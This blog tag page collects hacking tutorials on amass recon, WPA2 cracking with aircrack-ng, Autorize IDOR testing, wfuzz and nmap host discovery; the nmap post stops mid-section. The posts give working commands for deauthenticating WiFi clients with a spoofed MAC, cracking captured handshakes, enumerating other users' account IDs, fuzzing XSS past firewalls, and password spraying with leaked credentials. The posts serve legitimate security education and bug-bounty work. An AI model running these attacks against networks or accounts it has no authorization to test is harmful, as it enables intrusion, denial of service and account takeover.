Tag: tool

  • Practical amass – How I configure and use amass in my recon flow

    Practical amass – How I configure and use amass in my recon flow

    If you’re into recon, you’ve probably heard of amass. It’s a powerful tool for mapping attack surfaces during bug bounty hunting or penetration testing. Here’s why I love it:

    • It’s close to an all-in-one recon tool.
    • It aggregates data from multiple resources (DNS, ASN, Whois, etc.).
    • Its capabilities can be extended with API keys.
    • It stores all data in a SQLite database, making information management and querying easier than relying on text files.

    Instead of repeating what’s already in the official tutorial, I’ll take you through how I use Amass in my bug bounty recon workflow.

    Global Configuration

    Once you install amass, the first step is setting up its configuration files. For me, these live in:

    ~/.config/amass/

    Then in here, I did the following:

    1. Create the Required Files:

    1. datasources.yaml: Stores API keys.
    2. config.yaml: Default configuration file.

    2. Set Up Datasources

    Run the following to see which sources need configuring:

     amass enum -list

    Any source marked with a star requires an API key. Register for as many free resources as possible to maximize Amass’s capabilities. For example, my datasources.yaml file contains:

    datasources:
      - name: Shodan
        creds:
          account:
            apikey: "<key>"
      - name: VirusTotal
        creds:
          account:
            apikey: "<key>"
      - name: SecurityTrails
        creds:
          account:
            apikey: "<key>"
    global_options:
      minimum_ttl: 1440

    3. Link Datasources to the Configuration

    Use config.yaml to reference your datasources file:

    options:
      datasources: <PATH TO>/.config/amass/datasources.yaml

    For a basic setup, this configuration is enough. You can explore more customization options in the OWASP Amass project.

    Workspace Setup

    Before I start working on a program, I create a directory for all of my program-specific work:

    ~/bounties/<program-name>/recon/amass

    This is where I would store amass outputs, configuration files, and databases.

    Project-Specific Configuration

    In the amass directory, I maintain a separate config.yaml tailored to the specific program:

    scope:
      domains:
        - example.com
        - example1.com
      ips:
        - 127.0.0.1
      asns:
        - 1234
      blacklist:
        - sensitive.example.com
    options:
      timeout: 5
    

    This keeps Amass focused on the program’s defined scope and prevents unnecessary noise. You can point amass to this project-specific configuration file with the -config flag.

    Root Domain Discovery

    If you’re starting with ASNs, IP ranges, or an organization’s name, the intel command helps find root domains to target:

    amass intel -asn 16839 -dir amass -config recon/config.yaml

    Or, if you already have a domain and want to expand the attack surface:

    amass intel -whois -d example.com -dir amass -config recon/config.yaml

    This performs a reverse whois lookup, gathering related domains.

    Subdomain Discovery

    Once you’ve identified root domains, it’s time to dig deeper with enum:

    amass enum -d example.com -dir amass -config recon/config.yaml

    This will map out subdomains for further analysis.

    By default, amass enum runs passively, meaning it relies solely on 3rd parties for the information. You can use the active flag to tell it to directly interact with the target for (potentially) more results and increased accuracy:

    amass enum -active -d example.com -dir amass -config recon/config.yaml

    This will likely take longer to run than the passive option. I recommend starting with passive then circling back to active once you’ve exhausted your exploitation efforts.

    It’s also worth noting that amass has capabilities for performing subdomain brute-forcing. One useful option being a hashcat-like masking option. I’ll leave that for you to explore in the official tutorial.

    Parsing Gathered Domains

    amass organizes all data in a SQLite database stored in the directory specified by the -dir flag. Using sqlite3, you can query and manage the data:

    $ sqlite3 amass.sqlite
    sqlite> .tables
    assets           gorp_migrations  relations
    

    The assets table is the most relevant, categorizing data into types like FQDN, IPAddress, ASN, and more.

    An example query to extract recent IPv4 addresses:

    SELECT content -> 'address'
    FROM assets 
    WHERE type = 'IPAddress' 
    AND json_extract(content, '$.type') = 'IPv4' 
    ORDER BY last_seen DESC 
    LIMIT 10;
    

    As you can see, using sqlite as the DBM makes it easy to pull exactly what you need and plug it into other tools.

    Why SQLite Beats Legacy Features

    Older versions of Amass supported amass db for queries and amass viz for visualization. While those features were neat, I prefer direct database queries. They give you more control and are easy to script for repeated workflows.

    For example, you could write a script to export all gathered domains and IPs into separate files for further analysis.

    Also, the viz feature doesn’t add much value in my opinion. For me, visualizing massive amounts of data would be more overwhelming than useful.

    I’d much rather pull only what stands out to me and throw it in a mind-mapping tool (like xmind). That way, I can work in a less cluttered environment.

    Conclusion

    amass is a game-changer for recon workflows. While setting up API keys may cost some time (and occasionally money), it’s an investment that will give you an edge in bug bounty programs.

    I highly encourage you to experiment with this tool, tweak configurations, and build scripts to fit your needs.

    Happy hunting!

  • How to crack your WiFi network’s password with aircrack-ng

    How to crack your WiFi network’s password with aircrack-ng

    Hello again! If you read my last post on AP and Client discovery with Airodump-ng, then get ready to take the skills you learned to the next level! We’re not just going to be observers anymore. We’re going to hack wireless networks by cracking their passwords!

    This method involves using airodump-ng to capture the necessary traffic we need to use the infamous wireless cracking tool, aircrack-ng to crack passwords using a wordlist. And the best part is, this can be done completely offline!

    Let’s get started!

    Wireless Encryption

    Before we get started with hacking WiFi, there are a few things we have to understand first.

    Wireless Access Points (APs) support a variety of different encryption standards. Those in existence are WEP, WPA, WPA2, and WPA3.

    WEP is the weakest and can be cracked quickly without a wordlist. WPA, WPA2, and WPA3 are improvements of each other. We’re not going to go into the details but just know that each one that follows offers stronger encryption and other security improvements.

    The encryption standard we are going to be focusing on is WPA2. It has been around since 2004 and its successor has yet to make a full public appearance (at the time of this writing). If you did some snooping after reading my post about airodump-ng, you might have noticed that the most popular encryption type was WPA2. That’s because it’s the strongest encryption method that offers the most support for wireless devices. Your home network is probably encrypted with WPA2 and many businesses use WPA2 encryption.

    We’re also going to be focusing on WPA2/PSK, not the Enterprise variety. PSK stands for Pre-shared Key and if you’ve ever logged into a WiFi network with a plain-text password, you’ve used PSK encryption. Enterprise requires an additional server, called a RADIUS server, and users are authenticated with an account. For this reason, it is used for businesses because it offers centralized control.

    WPA2/PSK is the most common encryption method for a wireless network at the time of this writing. So, you’ll likely have plenty of options to experiment with.

    The 4-way Handshake

    The 4-way handshake occurs every time a client associates itself with a wireless access point (a user logs-in to the WiFi). Basically, the purpose of this 4-way handshake is to generate the encryption keys needed for an authorized client to communicate with the AP.

    We’re not going to go super in-depth on the protocol behind this but this diagram from a Medium article sums the process up nicely:

    I recommend checking that article out for a pretty decent explanation. This youtube video is also pretty good at explaining the 4-way handshake.

    All you need to know is that when we capture this 4-way handshake, aircrack-ng is going to use each guess and necessary parameters from the handshake to reconstruct the encryption keys (PTK and/or GTK). Then, it will hash the encryption keys to form the MICs (Message Integrity Check). If the MIC matches the original MIC from the captured handshake, the guess is correct.

    If you didn’t get all that don’t worry! Seeing this in action might help to clear things up. Even if it doesn’t, it took me a while to understand this process in-depth.

    Capturing the Handshake

    Ok! Onto the fun stuff! The first step in this process is to get that 4-way handshake. To do that we need a couple of things:

    1. a running instance of airodump-ng
    2. a client to associate with the network (a WiFi network you can log in to)

    First, let’s get our network card into monitor mode:

    $ sudo airmon-ng start wlx9cefd5fee020

    Now, our network card is ready to start capturing information. Fire up airodump-ng:

    $ sudo airodump-ng wlan0mon
    
    D8:38:FC:FC:EB:A9  -41        2        0    0   1  130   WPA2 CCMP   PSK  Hack Me

    You can stop here and wait for airmon-ng to capture a handshake from any network within range or target a specific one. aircrack-ng can recognize multiple handshakes and you can choose from the list you gathered but I’m going to target a specific network I already have access to:

    $ sudo airodump-ng --bssid D8:38:FC:FC:EB:A9 -c 1 wlan0mon -w ~/Desktop/mywifi
    
     CH  1 ][ Elapsed: 12 s ][ 2023-06-27 16:09 ][ WPA handshake: D8:38:FC:FC:EB:A9 
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
     D8:38:FC:FC:EB:A9  -43   0      105       17    8   1  130   WPA2 CCMP   PSK  Hack Me                                                        
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
     D8:38:FC:FC:EB:A9  18:26:49:74:0B:E4   -6   36e- 6e    21       62  EAPOL

    This process should be pretty familiar to you by now. One difference is that we captured a WPA handshake. airodump-ng handily tells us this in the top right.

    Remember to capture the handshake we need a client to associate with the AP. In my case, since I already knew the password, I just re-authenticated with my phone.

    If you don’t know the password, you have a couple of options:

    1. Wait until a client re-associates
    2. Force a client to re-associate

    The second option is illegal but I’ll show you how to do it for educational purposes only. Note: your traffic will be logged by the AP and there is a chance you could get caught for this, so do it at your own risk

    To force re-authentication on clients, we can kick them off the network with aireplay-ng:

    $ sudo aireplay-ng -0 100 -a D8:38:FC:FC:EB:A9 wlan0mon

    This command will 100 send deauthentication frames (-0 100) to everyone on my network (-a <BSSID>). In other words, I would be DOS-ign my network if I were to run this.

    To make this a little stealthier, we can target a single client with -c <client MAC> and spoof our MAC address with -h <spoofed MAC>:

    $ sudo aireplay-ng -0 3 -a D8:38:FC:FC:EB:A9 -c 27:18:C2:1B:0B:A4 -h 44:28:78:90:C1:68 wlan0mon

    Whichever route you go, you should now have captured a handshake and written the captured data to a file. I saved mine to ~/Desktop/mywifi. Let’s open Wireshark to see what the handshake looks like:

    The protocol used for the handshake is EAPOL, so I filtered my results to display only the handshake. As expected, there are four of them.

    Cracking the password

    The moment we’ve all been waiting for…Now we get to crack the password!

    At this point, we’ve gathered everything we need to start our attack. If you haven’t done so already, you can go ahead and take your network card out of monitor mode and shutdown airodump-ng:

    $ sudo airmon-ng stop wlan0mon

    To crack my network’s password, I’m going to use the infamous rockyou.txt wordlist. This wordlist is commonly used in CTFs and other hacking challenges involving password cracking because of its popularity. It even comes preinstalled in some hacking Linux distributions like Kali Linux. So, if your password shows up in rockyou, I suggest you change it…

    To crack the password, all you need to give aircrack-ng is the wordlist and the capture file like so:

    $ aircrack-ng -w /opt/rockyou.txt mywifi-01.cap
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  D8:38:FC:FC:EB:A9  Hack Me             WPA (1 handshake)
    
    Choosing first network as target.
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
    1 potential targets
    
    
    
                                   Aircrack-ng 1.6 
    
          [00:00:02] 18440/10303727 keys tested (10231.10 k/s) 
    
          Time left: 16 minutes, 45 seconds                          0.18%
    
                               KEY FOUND! [ appletree ]
    
    
          Master Key     : 1F 9A CD 80 9E 4A 5D 41 F8 49 28 52 94 D9 5D 5A 
                           C7 6F 5A FC 41 98 74 51 91 F6 E5 E9 FC 22 CC E4 
    
          Transient Key  : 2B 3A 52 BC 76 6A 6A 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    
          EAPOL HMAC     : 24 41 72 F8 5E 04 E4 6F 37 72 24 CC 57 F9 0B E3

    As you can see, it automatically identified the handshake and since there was only one in the file, it got straight to cracking. In no time at all, it was able to find the password: appletree. For me, it took less than a few seconds. Embarrassing…

    We can also see that it was able to calculate the other parameters of the 4-way handshake including the PMK (Master Key), the PTK, and the MIC (EAPOL HMAC).

    And that’s it! Easy peezee-lemon-squeezy! Of course, your results will depend on the wordlist you use. If your password is not in the wordlist, you won’t be able to crack the password. For proof of concept, you might want to make a small test wordlist with your WiFi password included (assuming you’re attacking a network you have access to).

    Conclusion

    You now know how to crack WiFi passwords running WPA2/PSK encryption! Give yourself a pat on the back hacker!

    Of course, it goes without saying that if you crack the password of a network and then use that password to get unauthorized access to the network, that is where you cross the line into illegal territory. So please, don’t do that. 🙂

    By all means, try this out 100% passively. See what information you can gather with airodump-ng just by leaving it running in your home for an hour or so. You might be surprised at what you’ve gathered. Then try cracking passwords for fun!

    It’s surprising how many people will opt for insecure passwords. I mean, my own apartment complex’s network opted for one of the weakest passwords in the book… Come on! It’s 2023! No matter how secure a system is, people will always be the weakest link. I changed the BSSID and the ESSID of the network in the examples to avoid legal trouble but their WiFi might as well be public…

    Anyways…Hope you enjoyed this article. I certainly enjoyed writing it! Stay tuned for more and practice responsibly!

  • Make access control bug discovery fast and easy with Autorize

    Make access control bug discovery fast and easy with Autorize

    We’re back from our slight detour to swing back into web app testing! Don’t worry though, I haven’t given up on wireless stuff. More content for that coming soon!

    In this post, I’m going to walk through a demo that makes use of my favorite Burpsuite extension: Autorize. Autorize is a plugin that makes testing for access control vulnerabilities easy. You can just let it run in the background as you peruse the web app you’re testing and it will tell you what can be bypassed automagically!

    So, let’s jump right into the demo.

    Installing Autorize

    Autorize doesn’t come with Burp by default. To use it’s magical powers, we’re going to have to install it ourselves. Luckily Burpsuite makes this super easy for us by hosting it on the BAppstore. You can find the BAppstore under the extensions tab. Then a simple search for “Autorize” will pull it right up for you:

    Then just click the orange “Install” button to install it. My button says “Reinstall” because I already have it all setup.

    If you have a greyed out button, you’ll need to install and configure Jython because Burpsuite is a Java tool and Autorize is written in Python. To do that, you can download the Jython standalone here. Then, just go to the “Extensions settings” under the “Extensions” tab and add the location of your Jython standalone JAR file like so:

    And now you should be able to run Autorize!

    Demo Time

    For demonstration purposes, I’m going to be testing an instance of OWASP Juiceshop running locally. If you haven’t heard of it, Juiceshop is a web app built with modern web technologies designed to be intentionally vulnerable so that you can practice what you’ve learned. It also has a ton of guided walk-throughs so I highly recommend trying it out if you want to get into web penetration testing.

    Ok, let’s get started. To run Autorize, we’re going to have to be running Burpsuite and have it proxy our web traffic (no surprise there). For Autorize to be able to auto-magically test for Authorization bugs, it needs whatever headers the web app uses for authentication.

    I went ahead and created two accounts for testing: sambamsam1@gmail.com and sambamsam2@gmail.com. To start, I’ll login in with sambamsam1 and grab the header I need to copy over to Autorize:

    OWASP Juice shop uses Bearer Tokens to authenticate, so I copied the entire Authorization header. Then, over in the new Authorize tab, you can just paste it in:

    And that’s all you need to set up Autorize. Pretty simple really. I like to add some filters to the list to make things easier for me. One of the filters I set up on every run is the “Scope items only” filter. This is essential if you’re testing on a Bug Bounty Program.

    Additionally, I like to add a “URL contains” filter (you can select them from the drop down then add content if needed), if I’m targeting a specific domain or endpoint. If I’m testing an API that makes excessive use of OPTIONS requests, there’s an option to filter those out too.

    Once you’ve got that all setup, logout and log back in as another user (in my case, sambamsam2) and you’re good to go! Click the “Autorize is off” button at the top and it will turn bright blue to indicate that everything is running.

    Now, all you have to do is browse the application like a user normally would. In this example, I added an item to my shopping cart as my sambamsam2 user.

    Popping back over to the Autorize tab, you’ll see a ton of requests pile up:

    The two columns with all the colors tell us if the authentication was bypassed with the temporary header (our other user’s authentication) or without any authentication at all. A lot of these requests aren’t of any interest to us. However, request 4 stood out to me because it seemed to have a simple numerical ID associated with it and seems to be accessible by our other user.

    We can right-click the request and send it to the Repeater (or Ctrl+R) for a closer look.

    In the Repeater tab, we can verify that the request is successfully being sent with the authorization token of our logged out user:

    And it looks like any logged in user can access other user’s shopping cart just by adding the correct ID to the URL. This vulnerability is known as an Insecure Direct Object Reference (IDOR) and can vary in severity depending on the predictability of the ID and the confidentiality of the data. In our case, items in a users shopping cart isn’t as revealing as a user’s address or social security number, but a numberic ID in the single-digits can be easily guessed, making this a bug of medium severity.

    I used jwt_tool in my terminal window to verify that the JWT Token in the request belonged to my other user, sambamsam1. jwt_tool is great for disecting JWT’s conveniently but it can also be used for exploiting the technology behind JWT’s. Maybe I’ll have to do a tutorial on that…

    Conlcusion

    As you can hopefully see, Autorize makes testing for Authentication vulnerabilities extremely easy. With Autorize, all you have to do is casually browse the application while it runs in the background.

    I used to have to go back and copy headers to every request I thought was interesting and resend the request every time I wanted to verify an IDOR or some other similar vulnerability. Now I can let it run while I explore or do other testing. Just don’t forget to check back every once in a while or you’ll have tons of requests to dig through.

    Autorize helped me find my first paid bug, which used a privilege escalation to perform IDORs. I found a JWT that seemed to belong to an admin user and used Autorize to see what it allowed me to have access to.

    Hope you add this tool to your arsenal and it helps you as much as I do! Stay tuned for more hacking tutorials coming soon!

  • Harnessing the power of wfuzz for web hacking

    Harnessing the power of wfuzz for web hacking

    In today’s post, I’ll introduce you to a tool that should be a part of every bug hunter’s toolkit, wfuzz! I use wfuzz in every bug bounty program I participate in. If you don’t know what wfuzz is, it’s a web application fuzzer. And if you haven’t heard of a web application fuzzer, they’re a type of tool that automates web requests.

    As you’ll see in this post, fuzzers are a simple yet extremely powerful tool and by the end of this reading you’ll be able to confidently use wfuzz, one of the best in the game!

    Practical Examples

    Instead of teaching you the syntax, I’m going to run you through a series of hypothetical, real-world examples so you can use it in your next pentest or bug hunt.

    For simplicity, I’m going to use a popular repository of wordlists called SecLists. These wordlists were put together by a few well-known security professionals including Daniel Miessler and Jason Haddix. I highly recommend you check out the repo and get familiar with what’s in some of the lists.

    Directory Discovery

    Discovering hidden files or directories of a web application can be a gold mine for security testers. wfuzz makes this a snap by fuzzing the target url:

    wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ"

    Let’s break this down:

    • -c, colored output to make output easier to read
    • -w, the specified wordlist
    • -u, the url to fuzz

    You might have noticed the word FUZZ in the URL. This is the keyword that tells wfuzz where to fuzz, or supply all the lines from the wordlist.

    In this example, the output would look something like this:

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************
    
    Target: https://example.com/FUZZ
    Total requests: 20116
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================
    
    000000007:   404        0 L      0 W      0 Ch        "cache"
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000009:   404        0 L      0 W      0 Ch        "js"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    000000002:   404        0 L      0 W      0 Ch        "images"
    ...

    As you can see, wfuzz neatly prints out the response code, payload used, as well as the number of lines, words, and characters in the response.

    To make the output a little cleaner, I can filter it based on any of the response attributes, like status code:

    $ wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --sc 200
    
    ...
    
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    ...

    Now all that is shown are responses with status code 200. We can also use use --/sl/sw/sh/ss<number> for only showing responses with a specific number of lines, words, characters or that match a specific regex respectively.

    Alternatively, you can replace --s with --h to hide matches rather than showing them.

    This one-liner can lead to some big finds, including configuration files, admin logins, and much more depending on the wordlist.

    Wordlist Contexts

    A little bit of recon with a tool like wappalyzer can go a long way. Knowing what Content Management System (think WordPress or Drupal), API endpoint locations, etc. can result in more findings.

    For example, if I knew my target was running on top of an Nginx server, I might use a wordlist catered towards default files and directories:

    wfuzz -c -w nginx.txt -u "https://example.com/FUZZ" --sc 200,403

    If you uncovered an API endpoint, you can use a wordlist of common object names (like user, team, admin, etc.):

    wfuzz -c -w /api/objects.txt -u "https://api.example.com/v2/FUZZ" --hl 4037

    Using a wordlist that is right for the situation makes it more likely that you’ll find something interesting. Don’t just blindly use random wordlists and there’s no one wordlist to rule them all!

    Subdomain Bruteforcing

    Finding subdomains is key to expanding your attack surface. More often than not, the most interesting subdomains aren’t found passively.

    wfuzz can fuzz anywhere the FUZZ keyword is located in a request, including in headers.

    To bruteforce subdomains with wfuzz, fuzz in the Host header:

    wfuzz -c -w /Discovery/DNS/deepmagic.com-prefixes-top500.txt -H "Host: FUZZ.example.com" -u "https://example.com"

    While wfuzz is capable, sometimes using a tool that is specifically built for this (like gobuster or amass) might be easier and yield better results.

    IDOR

    wfuzz offers a variety of payloads that can be used to fuzz with, including a list of numbers.

    If I stumbled upon a an id parameter in JSON that used a guessable four digit number, I might fuzz it like so to see if I can access any accounts I don’t own:

    wfuzz -c -z range,0000-9999 -X POST -H "Content-type: application/json" "https://example.com/myaccount" -d '{"id": "FUZZ"}'

    The -z parameter is used to specify a payload type and the payload options. You can see the full list of payload’s with wfuzz -e payloads.

    You might also notice that I changed the method from the default GET to POST with the -X option and added a body to my request with -d. This syntax should be familiar with you if you’ve every used curl before. Another reason why I love wfuzz!

    Injection

    If you’ve ever tested for injection vulnerabilities (like SQLi or command injection) then it is likely that your attempts have been blocked by a WAF (Web Application Firewall). WAFs are all fine and dandy but they’re not perfect.

    It can be useful to fuzz common payloads to see if any might slip through the cracks

    wfuzz -c -w Fuzzing/XSS/XSS-Somdev.txt -u "https://example.com?q=FUZZ" --hc 403

    In this example, I used a Cross-site Scripting (XSS) wordlist to see if any common payloads weren’t blocked. This likely will not lead to a XSS bug right away, but might clue me in on what keywords or encoding methods might allow me to build a working payload.

    If you’re into finding XSS bugs, fuzzing with Portswigger’s XSS Cheat Sheet can help you see what HTML tags and events are permitted so you can get an idea of how to build your own payload.

    Password Spraying

    Database leaks for a specific target can be a great asset when testing login pages, but with thousands of accounts to choose from, it can be hard to find valid credentials. Luckily, wfuzz can do this much faster than we can.

    Password spraying is the act of guessing the password of many different accounts (not just one like in brute-force attacks). To achieve this, you need to tell wfuzz to fuzz in two separate locations each with its own payload like so:

    wfuzz -c -m zip -w users.txt -w passwords.txt -X POST -u "https://example.com" -d "username=FUZZ&password=FUZ2Z" --sc 302

    For fuzzing multiple locations with different payloads, you need to supply FUZ<payload #>Z. In this example FUZZ is associated with users.txt and FUZ2Z with passwords.txt.

    I also supplied an iterator type of zip with the -m argument. The zip iterator type will match each of the payloads to the other, 1-to-1, so it is perfect for password spraying. If you’ve used Burp’s Intruder before, than the zip iterator is just like the Intruder’s Pitchfork attack type.

    We can list the other iterator types with the -e options like we did for payloads.

    Wrapping it all up

    wfuzz does one thing (and only one thing) well: spit out a bunch of requests really fast. It’s up to you to make it an effective hacking too.

    That means choosing the right wordlist for the job. There are tons of wordlists out there for different jobs. Don’t just limit yourself to SecLists. It’s a great wordlist and popular for a reason, but it’s popularity just means that a lot of other hunters are going to be using it too, so you’ll likely stumble across the same bugs they do.

    So, Google around and find wordlists that work for you. Or, better yet, make your own as you hunt!

    Also don’t go fuzzing around unless the program allows it. Sometimes there’s a request delay requirement and other times companies won’t permit the use of automated tools at all. Read the policy carefully! Otherwise, you may end up overwhelming the company’s servers.

    Now, you have most of what you need to unleash the power of wfuzz and hunt more efficiently! Happy hunting!

  • Nmap Basics

    Nmap Basics

    If there’s one tool every penetration tester should know it’s nmap. In this post, I’m going to teach you how to use it practically as one might use it in a real-world testing scenario.

    Don’t let the title fool you. Although we’re going to cover the basics here, we’re going to take a deeper dive into how to use this tool effectively. So, I’ll assume you have at least a basic understanding of the Internet and the protocol stack.

    Overview

    nmap is an open-source command line tool used to discover hosts connected to a network and expose what services might be listening on those hosts. It is extremely popular because it can map an entire network automatically, while also being flexible.

    I’m going to expose you to the more technical features of the tool while teaching you the basics so that you can use it flexibly and confidently. So, let’s jump into it!

    Host Discovery

    The first step in testing a network is figuring out what hosts (computers connected to a network) are up and running. After all, computers need to be powered on and connected to the same network we’re on for us to be able to attack them. We also don’t want to blindly spray exploits to all addresses–that’s just noisy and a waste of time.

    To get started with host discovery with nmap it’s as simple as running it and giving it a range of ip’s (or a single hostname/ip):

    $ nmap 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 13:51 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.00070s latency).
    Not shown: 999 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    53/tcp open  domain
    
    Nmap scan report for 192.168.186.71
    Host is up (0.0021s latency).
    Not shown: 997 closed tcp ports (conn-refused)
    PORT    STATE SERVICE
    22/tcp  open  ssh
    53/tcp  open  domain
    389/tcp open  ldap
    
    Nmap scan report for 192.168.186.93
    Host is up (0.0019s latency).
    Not shown: 999 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0023s latency).
    Not shown: 977 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    53/tcp   open  domain
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    5432/tcp open  postgresql
    5900/tcp open  vnc
    6000/tcp open  X11
    6667/tcp open  irc
    8009/tcp open  ajp13
    8180/tcp open  unknown
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 14.55 seconds

    I used the range 192.168.186.0/24 which is the equivalent of 192.168.186.0-255, or the subnet of my virtual network. As you can see, it produced quite a bit of output. I just wanted to see the hosts online and nmap went ahead and did a TCP-connect port scan on the top 1000 common ports as well.

    This is nice and all but it clutters up my terminal with more than I needed. We can use the -sn option to tell nmap not to do a port scan:

    $ nmap -sn 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 13:57 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0032s latency).
    Nmap scan report for 192.168.186.71
    Host is up (0.0019s latency).
    Nmap scan report for 192.168.186.93
    Host is up (0.0013s latency).
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0042s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.32 seconds

    Much better. If you notice at the bottom of the scan, this was performed much faster (2.32 seconds vs 14.55 seconds in the first scan). This might seem marginal at first but imagine scanning a much larger network (like a business network).

    By default, nmap uses a variety of methods to determine if a host is online. Let’s check this out by scanning a single host:

    $ sudo nmap -sn -vv ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:01 PDT
    Initiating ARP Ping Scan at 14:01
    Scanning ms2 (192.168.186.131) [1 port]
    Completed ARP Ping Scan at 14:01, 0.04s elapsed (1 total hosts)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up, received arp-response (0.0013s latency).
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
               Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

    I used the -vv option to make nmap spit out very verbose output so it can tell us what it’s doing step by step. ms2 is a hostname I configured my system to recognize as 192.168.186.131 (my metasploitable instance). As I mentioned earlier, you can supply nmap with a human-readable hostname and it will automatically go out and resolve the IP address for you.

    Reading the output, we can see that nmap ran an ARP scan and started a port scan, but after the ARP scan finished, it deemed the host was up. This is because nmap will use a variety of methods to scan a host, including:

    • ARP scan (local network only)
    • ICMP echo request
    • sending a TCP SYN packet to port 443
    • sending a TCP ACK packet to port 80
    • sending an ICMP timestamp request

    If these methods fail, the host is considered offline. Those of you with keen eyes will notice that I ran nmap with sudo. That’s because nmap relies on packet crafting to do some of it’s scans, which requires root level privileges. Let’s see what happens when we run it without sudo

    $ nmap -vv -sn ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:00 PDT
    Initiating Ping Scan at 14:00
    Scanning ms2 (192.168.186.131) [2 ports]
    Completed Ping Scan at 14:00, 0.00s elapsed (1 total hosts)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up, received syn-ack (0.0020s latency).
    Nmap done: 1 IP address (1 host up) scanned in 0.00 seconds

    This time, nmap performed a ping scan instead of an ARP scan and performed a TCP scan as well. The TCP scan received a SYN-ACK which is how nmap was able to tell the system was online. It’s important to take this information into account as it could lead to some false negatives while testing (what if the host blocked ICMP traffic and the ports scanned)?

    So, I would encourage you to use sudo to get the most out of nmap. You’ll definitely need it when I talk about performing different types of host discovery in the next few sections.

    ARP Scanning

    The first method of host discovery I’m going to talk about is ARP scanning. ARP or Address Resolution Protocol resolves IP addresses into MAC addresses. This protocol sits low on the stack, which means it has a low overhead (less data per packet) giving two key advantages when using it for scanning:

    1. Faster
    2. Stealthier (may slip past firewalls/IDS’s)

    The only caveat is that it only works on local networks (can’t scan over the internet). So, know what context you’re scanning in!

    We can perform an ARP scan with nmap by telling it not to do ping scans with the -Pn option:

    $ sudo nmap -sn -PRn 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:59 PDT
    Nmap scan report for 192.168.186.1
    Host is up (0.0013s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.186.2
    Host is up (0.00045s latency).
    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0047s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.00098s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0016s latency).
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    Nmap scan report for 192.168.186.254
    Host is up (0.00078s latency).
    MAC Address: 00:50:56:EA:7A:B5 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (7 hosts up) scanned in 2.02 seconds

    You’ll notice that I also used the R option with -P. This is because I wanted to eliminate false positives by having nmap perform Reverse DNS resolution on the hosts it finds, which it can only do with live hosts.

    Doing it without, results in a mess:

    $ sudo nmap -sn -Pn 192.168.186.80-85
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 15:03 PDT
    Nmap scan report for 192.168.186.80
    Host is up.
    Nmap scan report for 192.168.186.81
    Host is up.
    Nmap scan report for 192.168.186.82
    Host is up.
    Nmap scan report for 192.168.186.83
    Host is up.
    Nmap scan report for 192.168.186.84
    Host is up.
    Nmap scan report for 192.168.186.85
    Host is up.
    Nmap done: 6 IP addresses (6 hosts up) scanned in 0.01 seconds

    Here, I purposefully chose a range I knew didn’t have any connected hosts, yet nmap still said they were up…

    Using the R option felt like a cheat, so you might be better of using a different tool like arp-scan to do ARP scanning.

    Ping Scanning

    Higher up on the protocol stack is ping probing using the ICMP protocol. When most people think of pinging, they think of using the ping command to send ICMP echo requests.

    nmap can use ICMP echo requests, as well as other methods of the protocol using the -P switch:

    • -PE: echo request
    • -PP: timestamp query
    • -PM: address map query

    If a host replies, it’s online. I scanned my network using the --disable-arp-ping flag to tell nmap only to do ping scanning:

    $ sudo nmap -sn -PE --disable-arp-ping 192.168.186.0/24
